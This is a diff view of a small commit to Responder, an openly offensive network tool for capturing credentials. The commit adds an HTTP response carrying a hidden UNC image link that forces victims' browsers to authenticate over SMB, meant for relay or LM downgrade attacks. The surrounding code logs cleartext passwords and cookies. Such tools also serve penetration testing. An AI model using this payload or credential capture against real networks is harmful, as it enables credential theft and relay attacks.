github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-08-19 21:03:33 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM.

Browse source
This commit is contained in:
Lgandx 2013-06-12 12:12:14 -04:00
commit 0fcaa68c07
2 changed files with 13 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

8
HTTPPackets.py
View file

@ -56,9 +56,13 @@ class IIS_Auth_Granted(Packet):
("Type", "Content-Type: text/html\r\n"), ("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"), ("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("Len", "Content-Length: 0\r\n"), ("ContentLen", "Content-Length: "),
("CRLF", "\r\n"), ("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
]) ])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
#HTTP NTLM Auth #HTTP NTLM Auth
class NTLM_Challenge(Packet): class NTLM_Challenge(Packet):

11
Responder.py
View file

@ -907,16 +907,18 @@ def PacketSequence(data,client):
if packetNtlm == "\x03": if packetNtlm == "\x03":
NTLM_Auth= b64decode(''.join(a)) NTLM_Auth= b64decode(''.join(a))
ParseHTTPHash(NTLM_Auth,client) ParseHTTPHash(NTLM_Auth,client)
buffer1 = str(IIS_Auth_Granted()) buffer1 = IIS_Auth_Granted()
return buffer1 buffer1.calculate()
return str(buffer1)
if b: if b:
GrabCookie(data,client) GrabCookie(data,client)
outfile = "HTTP-Clear-Text-Password-"+client+".txt" outfile = "HTTP-Clear-Text-Password-"+client+".txt"
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b))) WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
print "[+]HTTP-User & Password:", b64decode(''.join(b)) print "[+]HTTP-User & Password:", b64decode(''.join(b))
logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b)))) logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
buffer1 = str(IIS_Auth_Granted()) buffer1 = IIS_Auth_Granted()
return buffer1 buffer1.calculate()
return str(buffer1)
else: else:
return str(Basic_Ntlm(Basic)) return str(Basic_Ntlm(Basic))
@ -1432,3 +1434,4 @@ if __name__ == '__main__':
raw_input() raw_input()